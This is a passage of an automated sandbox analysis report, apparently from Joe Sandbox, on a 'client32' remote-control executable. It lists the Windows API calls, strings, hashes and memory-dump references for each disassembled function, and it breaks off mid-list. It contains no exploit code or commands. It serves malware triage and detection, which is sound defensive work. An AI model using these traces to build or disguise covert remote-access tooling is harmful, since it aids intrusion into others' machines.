                                                                                                                        • Instruction ID: 156f0d79109f07c40c4ac8670e692553d53260d930ebdb42a1d89f925a608cc0
                                                                                                                        • Opcode Fuzzy Hash: 312bc41d0c80e05ecd2e77a132ac577f729ffb3f5c645a3c4c1f69d055c1a107
                                                                                                                        • Instruction Fuzzy Hash: 9811947AF0022767D2116FB06C89B6FBA18AF8561DF104038FA1B85581EF24A94483F3
                                                                                                                        APIs
                                                                                                                        • GlobalAddAtomA.KERNEL32(NSMWndClass), ref: 1115ABA8
                                                                                                                        • GetLastError.KERNEL32 ref: 1115ABB5
                                                                                                                        • wsprintfA.USER32 ref: 1115ABC8
                                                                                                                          • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                          • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                          • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                          • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                          • Part of subcall function 110290F0: _strrchr.LIBCMT ref: 110291E5
                                                                                                                          • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 11029224
                                                                                                                        • GlobalAddAtomA.KERNEL32(NSMReflect), ref: 1115AC0C
                                                                                                                        • GlobalAddAtomA.KERNEL32(NSMDropTarget), ref: 1115AC19
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AtomGlobal$ErrorExitLastProcesswsprintf$Message_strrchr
                                                                                                                        • String ID: ..\ctl32\wndclass.cpp$GlobalAddAtom failed, e=%d$NSMDropTarget$NSMReflect$NSMWndClass$m_aProp
                                                                                                                        • API String ID: 1734919802-1728070458
                                                                                                                        • Opcode ID: 60df89256fdbe4fb07ae3e45b32be970c36e3097d10c8cf2f3f63e8d74a38f38
                                                                                                                        • Instruction ID: 447bd79fb7e316194c8fbcf3240c79f01d8f25fe8b238cd57140670aacafd43f
                                                                                                                        • Opcode Fuzzy Hash: 60df89256fdbe4fb07ae3e45b32be970c36e3097d10c8cf2f3f63e8d74a38f38
                                                                                                                        • Instruction Fuzzy Hash: 7811C475D01319AFC720EFFA9DC09AAF7B8FF01319B40462EE56653540EA7095408B5A
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                          • Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477
                                                                                                                        • std::exception::exception.LIBCMT ref: 1110D0CA
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 1110D0DF
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 1110D0F6
                                                                                                                        • InitializeCriticalSection.KERNEL32(-00000010,?,000000FF,?,11026F57,00000001,000003F0), ref: 1110D109
                                                                                                                        • InitializeCriticalSection.KERNEL32(111EC8A0,?,000000FF,?,11026F57,00000001,000003F0), ref: 1110D118
                                                                                                                        • EnterCriticalSection.KERNEL32(111EC8A0,?,000000FF,?,11026F57), ref: 1110D12C
                                                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,000000FF,?,11026F57), ref: 1110D152
                                                                                                                        • LeaveCriticalSection.KERNEL32(111EC8A0,?,000000FF,?,11026F57), ref: 1110D1DF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$Initialize$CreateCurrentEnterEventException@8LeaveThreadThrow_memsetstd::exception::exceptionwsprintf
                                                                                                                        • String ID: ..\ctl32\Refcount.cpp$QueueThreadEvent
                                                                                                                        • API String ID: 144328431-1024648535
                                                                                                                        • Opcode ID: ec2df561275c0d64ba6d257a16c8b5c35912085c7d85a207c9b9c2d87efd88b9
                                                                                                                        • Instruction ID: 09a7b7f2a39b786243c3074fc4a04aff0e2c3ee4e0c0e7a142bf3ec4b628a9f7
                                                                                                                        • Opcode Fuzzy Hash: ec2df561275c0d64ba6d257a16c8b5c35912085c7d85a207c9b9c2d87efd88b9
                                                                                                                        • Instruction Fuzzy Hash: F941C075E01315ABDB12CFA98D84BAEFBE4FB88718F54852AE819D3244E731A5008B51
                                                                                                                        APIs
                                                                                                                        • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,7E4636A2,?,00000000,00000001), ref: 11158267
                                                                                                                        • CoCreateInstance.OLE32(111C06FC,00000000,00000017,111C062C,?), ref: 11158287
                                                                                                                        • wsprintfW.USER32 ref: 111582A7
                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 111582B3
                                                                                                                        • wsprintfW.USER32 ref: 11158367
                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 11158408
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Stringwsprintf$AllocCreateFreeInitializeInstanceSecurity
                                                                                                                        • String ID: SELECT * FROM %s$WQL$root\CIMV2
                                                                                                                        • API String ID: 3050498177-823534439
                                                                                                                        • Opcode ID: 201d508ae0e233346d067116be793b91e5c0e3a726f34fbff0a0ba0680b7bfee
                                                                                                                        • Instruction ID: 5c9d69ea3c7034288904af0a1b42e56c7497ab7ebaebdabd712d66f14354dd8e
                                                                                                                        • Opcode Fuzzy Hash: 201d508ae0e233346d067116be793b91e5c0e3a726f34fbff0a0ba0680b7bfee
                                                                                                                        • Instruction Fuzzy Hash: 3A517071B00219AFD7A0DB69CC94F9BF7B9FB8A714F1042A9E819D7251D630AE40CF51
                                                                                                                        APIs
                                                                                                                        • CoInitialize.OLE32(00000000), ref: 11112B55
                                                                                                                        • CoCreateInstance.OLE32(111BBF3C,00000000,00000001,111BBF4C,00000000,?,00000000,Client,silent,00000000,00000000,?,1104B1EB), ref: 11112B6F
                                                                                                                        • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000000,Client,silent,00000000,00000000), ref: 11112B94
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetSettings), ref: 11112BA6
                                                                                                                        • SHGetSettings.SHELL32(?,00000200,?,00000000,Client,silent,00000000,00000000), ref: 11112BB9
                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00000000,Client,silent,00000000,00000000), ref: 11112BC5
                                                                                                                        • CoUninitialize.COMBASE(00000000), ref: 11112C61
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Library$AddressCreateFreeInitializeInstanceLoadProcSettingsUninitialize
                                                                                                                        • String ID: SHELL32.DLL$SHGetSettings
                                                                                                                        • API String ID: 4195908086-2348320231
                                                                                                                        • Opcode ID: 28dcea0cc7f8a025214f6af9fd2057e380903a455cb1bbc279c23e6119f70c8b
                                                                                                                        • Instruction ID: 68fa62bcea783be6e527966318309be417962e86cfe8c7ca8d2a125abe7bdbbc
                                                                                                                        • Opcode Fuzzy Hash: 28dcea0cc7f8a025214f6af9fd2057e380903a455cb1bbc279c23e6119f70c8b
                                                                                                                        • Instruction Fuzzy Hash: 00515DB5A002169FDB04DFE5C9C4AEFFBB9FF88304F218569E615AB244D730A941CB61
                                                                                                                        APIs
                                                                                                                        • _calloc.LIBCMT ref: 685A2FBB
                                                                                                                        • GetTickCount.KERNEL32 ref: 685A300D
                                                                                                                        • InterlockedExchange.KERNEL32(?,00000000), ref: 685A301B
                                                                                                                        • _calloc.LIBCMT ref: 685A303B
                                                                                                                        • _memmove.LIBCMT ref: 685A3049
                                                                                                                        • InterlockedDecrement.KERNEL32(?), ref: 685A307F
                                                                                                                        • SetEvent.KERNEL32(00000308,?,?,?,?,?,?,?,?,?,?,?,?,?,?,97A234B3), ref: 685A308C
                                                                                                                          • Part of subcall function 685A28D0: wsprintfA.USER32 ref: 685A2965
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Interlocked_calloc$CountDecrementEventExchangeTick_memmovewsprintf
                                                                                                                        • String ID: a3Zh$a3Zh
                                                                                                                        • API String ID: 3178096747-1469771974
                                                                                                                        • Opcode ID: c3b386c5d1f3d419a61cc250ec1f38c9d0b35944b3ff5a5a76c454e13496c827
                                                                                                                        • Instruction ID: 34c56f1df615941f22e7a00de43ead90c8a12db29b9b1b45dd867d994322e2e9
                                                                                                                        • Opcode Fuzzy Hash: c3b386c5d1f3d419a61cc250ec1f38c9d0b35944b3ff5a5a76c454e13496c827
                                                                                                                        • Instruction Fuzzy Hash: 104137B5D00209AFDB10DFA5D885AEFB7F8FF88304F408516E915E7240E7759A458BA1
                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(IPHLPAPI.DLL,00000000,685B0F2B,89DA8021,00000000,?,?,685CF278,000000FF,?,6859AE0A,?,00000000,?,00000080), ref: 685B0D48
                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 685B0D5B
                                                                                                                        • GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,?,?,-685DCB4C,?,?,685CF278,000000FF,?,6859AE0A,?,00000000,?,00000080), ref: 685B0D76
                                                                                                                        • _malloc.LIBCMT ref: 685B0D8C
                                                                                                                          • Part of subcall function 685B1B69: __FF_MSGBANNER.LIBCMT ref: 685B1B82
                                                                                                                          • Part of subcall function 685B1B69: __NMSG_WRITE.LIBCMT ref: 685B1B89
                                                                                                                          • Part of subcall function 685B1B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,685BD3C1,685B6E81,00000001,685B6E81,?,685BF447,00000018,685D7738,0000000C,685BF4D7), ref: 685B1BAE
                                                                                                                        • GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,00000000,?,?,?,?,?,685CF278,000000FF,?,6859AE0A,?,00000000,?), ref: 685B0D9F
                                                                                                                        • _free.LIBCMT ref: 685B0D84
                                                                                                                          • Part of subcall function 685B1BFD: HeapFree.KERNEL32(00000000,00000000), ref: 685B1C13
                                                                                                                          • Part of subcall function 685B1BFD: GetLastError.KERNEL32(00000000), ref: 685B1C25
                                                                                                                        • _free.LIBCMT ref: 685B0DAF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AdaptersAddressesHeap_free$AddressAllocateErrorFreeLastLibraryLoadProc_malloc
                                                                                                                        • String ID: GetAdaptersAddresses$IPHLPAPI.DLL
                                                                                                                        • API String ID: 1360380336-1843585929
                                                                                                                        • Opcode ID: 0793eb672395ac2a3c93fec248c92fd000900b9a54595b2b6bf680a5682af908
                                                                                                                        • Instruction ID: 42ad6cadc272536a2ff2776ff80aeab67ed087ff2e94416cc8d5ca3a43c0c877
                                                                                                                        • Opcode Fuzzy Hash: 0793eb672395ac2a3c93fec248c92fd000900b9a54595b2b6bf680a5682af908
                                                                                                                        • Instruction Fuzzy Hash: 7501D4B5240341AFE6209B709D94F6B77ACAB50B00F50481DF9669B2C0EA71F840C724
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 111419A0: RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?), ref: 11141A10
                                                                                                                          • Part of subcall function 111419A0: RegCloseKey.ADVAPI32(?), ref: 11141A74
                                                                                                                        • _memset.LIBCMT ref: 11141AF5
                                                                                                                        • GetVersionExA.KERNEL32(?), ref: 11141B0E
                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll), ref: 11141B35
                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 11141B47
                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 11141B5F
                                                                                                                        • GetSystemDefaultLangID.KERNEL32 ref: 11141B6A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Library$AddressCloseDefaultFreeLangLoadOpenProcSystemVersion_memset
                                                                                                                        • String ID: GetUserDefaultUILanguage$kernel32.dll
                                                                                                                        • API String ID: 4251163631-545709139
                                                                                                                        • Opcode ID: f4403c578d20b82e01fbdbd50243d795ec373803681fb6755249e61f6e885c6b
                                                                                                                        • Instruction ID: b52f9434772b6d6e8d8038633bf4c77d33c7f8479cfcef56ad60021fb0ce4fde
                                                                                                                        • Opcode Fuzzy Hash: f4403c578d20b82e01fbdbd50243d795ec373803681fb6755249e61f6e885c6b
                                                                                                                        • Instruction Fuzzy Hash: BE31E331F006268BD7119FB5C984BAEF7B0EB05718FA04575E928C3680E7346985CB92
                                                                                                                        APIs
                                                                                                                        • wsprintfA.USER32 ref: 110152AA
                                                                                                                        • _memset.LIBCMT ref: 110152EE
                                                                                                                        • RegQueryValueExA.KERNEL32(?,PackedCatalogItem,00000000,?,?,?,?,?,00020019), ref: 11015328
                                                                                                                        Strings
                                                                                                                        • %012d, xrefs: 110152A4
                                                                                                                        • NSLSP, xrefs: 11015338
                                                                                                                        • PackedCatalogItem, xrefs: 11015312
                                                                                                                        • SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries, xrefs: 1101522B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: QueryValue_memsetwsprintf
                                                                                                                        • String ID: %012d$NSLSP$PackedCatalogItem$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries
                                                                                                                        • API String ID: 1333399081-1346142259
                                                                                                                        • Opcode ID: 13c1aca20664a4fc0e133d793f1d669f9232a02ffdca666f732179c289691334
                                                                                                                        • Instruction ID: 40dd4717f0c7ad5754e433c7b85868c8d74bcde588045e86a78ebe46af68b9ce
                                                                                                                        • Opcode Fuzzy Hash: 13c1aca20664a4fc0e133d793f1d669f9232a02ffdca666f732179c289691334
                                                                                                                        • Instruction Fuzzy Hash: 01418F75D022299EEB11DF50CC94BEEF7B4EB45318F0445E8E91AA7281EB34AB44CF51
                                                                                                                        APIs
                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 1100FFBD
                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 1100FFE0
                                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 11010064
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 11010072
                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 11010085
                                                                                                                        • std::locale::facet::_Facet_Register.LIBCPMT ref: 1101009F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
